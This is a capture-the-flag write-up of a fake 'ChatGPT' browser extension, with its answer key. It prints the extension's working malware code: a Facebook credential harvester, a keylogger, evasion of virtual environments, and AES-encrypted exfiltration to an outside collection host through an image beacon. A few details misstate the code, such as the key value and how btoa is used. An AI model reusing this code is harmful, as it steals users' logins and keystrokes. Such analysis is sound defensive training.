FakeGPT
Challenge Link: FakeGPT
Scenario:
Your cybersecurity team has been alerted to suspicious activity on your organization’s network. Several employees reported unusual behavior in their browsers after installing what they believed to be a helpful browser extension named “ChatGPT”. However, strange things started happening: accounts were being compromised, and sensitive information appeared to be leaking.
Analysis:
The files related to the suspicious browser extension are shown in image below:
manifest.json
Lets start by reviewing the extension’s core configuration file, manifest.json.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
{
"manifest_version": 2,
"name": "ChatGPT",
"version": "1.0",
"description": "An AI-powered assistant extension.",
"permissions": [
"tabs",
"http://*/*",
"https://*/*",
"storage",
"webRequest",
"webRequestBlocking",
"cookies"
],
"background": {
"scripts": ["system/loader.js"],
"persistent": true
},
"content_scripts": [
{
"matches": ["<all_urls>"],
"js": ["core/app.js"]
}
],
"browser_action": {
"default_popup": "assets/ui.html"
}
}
The manifest version is 2, which is now deprecated.
The extension defines following suspicious permissions:
- Access to all sites (
http://*/*andhttps://*/*). - Access to
cookies.
The background script loader.js executes persistently ("persistent": true) in the background even when no extension window is open.
The content script app.js is injected into every webpage (<all_urls>) the user visits.
loader.js
Lets now analyze the background script, loader.js.
Anti-Virtual Environment
1
2
3
4
5
// Check if the browser is in a virtual environment
if (navigator.plugins.length === 0 || /HeadlessChrome/.test(navigator.userAgent)) {
alert("Virtual environment detected. Extension will disable itself.");
chrome.runtime.onMessage.addListener(() => { return false; });
}
The extension detects environment with no browser plugins (navigator.plugins.length === 0) and also browsers executing in headless mode (/HeadlessChrome/.test()) . If either check match, the extension pops up an alert and then sets chrome.runtime.onMessage listener to false, making the extension non-communicative to make it act as disabled.
Load & Execute Payload
1
2
3
4
5
6
7
8
9
10
11
12
// Load additional scripts dynamically
function loadScript(url, callback) {
var script = document.createElement('script');
script.src = url;
script.onload = callback;
document.head.appendChild(script);
}
// Load and execute the core functionality
loadScript('core/app.js', function() {
console.log('Core functionality loaded.');
});
The extension then dynamically loads another script app.js.
app.js
Lets now analyze the payload app.js.
FB Credential Harvesting
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
var _0xabc1 = function(_0x321a) {
return _0x321a;
};
var _0x5eaf = function(_0x5fa1) {
return btoa(_0x5fa1);
};
const targets = [_0xabc1('d3d3LmZhY2Vib29rLmNvbQ==')];
if (targets.indexOf(window.location.hostname) !== -1) {
document.addEventListener('submit', function(event) {
let form = event.target;
let formData = new FormData(form);
let username = formData.get('username') || formData.get('email');
let password = formData.get('password');
if (username && password) {
exfiltrateCredentials(username, password);
}
});
}
There is a little obfuscation function that ultimately decodes d3d3LmZhY2Vib29rLmNvbQ== string from base64 using btoa(). The resulting string is www.facebook.com. So this extension targets Facebook.
This extension listen for submit event on www.facebook.com, reads the submitted form via FormData(), and extracts username/email and password fields. Then it exfiltrate the collected credentials via exfiltrateCredentials().
Keylogging
1
2
3
4
document.addEventListener('keydown', function(event) {
var key = event.key;
exfiltrateData('keystroke', key);
});
The extension captures every keystroke using keydown event and exfiltrate the collected data via exfiltrateData().
Exfiltration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
function exfiltrateCredentials(username, password) {
const payload = { user: username, pass: password, site: window.location.hostname };
const encryptedPayload = encryptPayload(JSON.stringify(payload));
sendToServer(encryptedPayload);
}
function encryptPayload(data) {
const key = CryptoJS.enc.Utf8.parse('SuperSecretKey123');
const iv = CryptoJS.lib.WordArray.random(16);
const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv });
return iv.concat(encrypted.ciphertext).toString(CryptoJS.enc.Base64);
}
function sendToServer(encryptedData) {
var img = new Image();
img.src = 'https://Mo.Elshaheedy.com/collect?data=' + encodeURIComponent(encryptedData);
document.body.appendChild(img);
}
function exfiltrateData(type, data) {
const payload = { type: type, data: data, site: window.location.hostname };
const encryptedPayload = encryptPayload(JSON.stringify(payload));
sendToServer(encryptedPayload);
}
Before exfiltrating to attacker server, the collected data is encrypted using AES encryption using hardcoded SuperSecretKey124 key and random IV. This hides data in transit to avoid security monitoring.
The encrypted data are exfiltrated by creating an <img> element whose src points to attacker server URL with encrypted data https://Mo.Elshaheedy.com/collect?data=. This bypass security monitoring.
Questions:
Which encoding method does the browser extension use to obscure target URLs, making them more difficult to detect during analysis?
Show Answer
Base64 Which website does the extension monitor for data theft, targeting user accounts to steal sensitive information?
Show Answer
www.facebook.com Which type of HTML element is utilized by the extension to send stolen data?
Show Answer
<img> What is the first specific condition in the code that triggers the extension to deactivate itself?
Show Answer
navigator.plugins.length === 0 Which event does the extension capture to track user input submitted through forms?
Show Answer
submit Which API or method does the extension use to capture and monitor user keystrokes?
Show Answer
keydown What is the domain where the extension transmits the exfiltrated data?
Show Answer
Mo.Elshaheedy.com Which function in the code is used to exfiltrate user credentials, including the username and password?
Show Answer
exfiltrateCredentials(username, password); Which encryption algorithm is applied to secure the data before sending?
Show Answer
AES What does the extension access to store or manipulate session-related data and authentication information?
Show Answer
cookies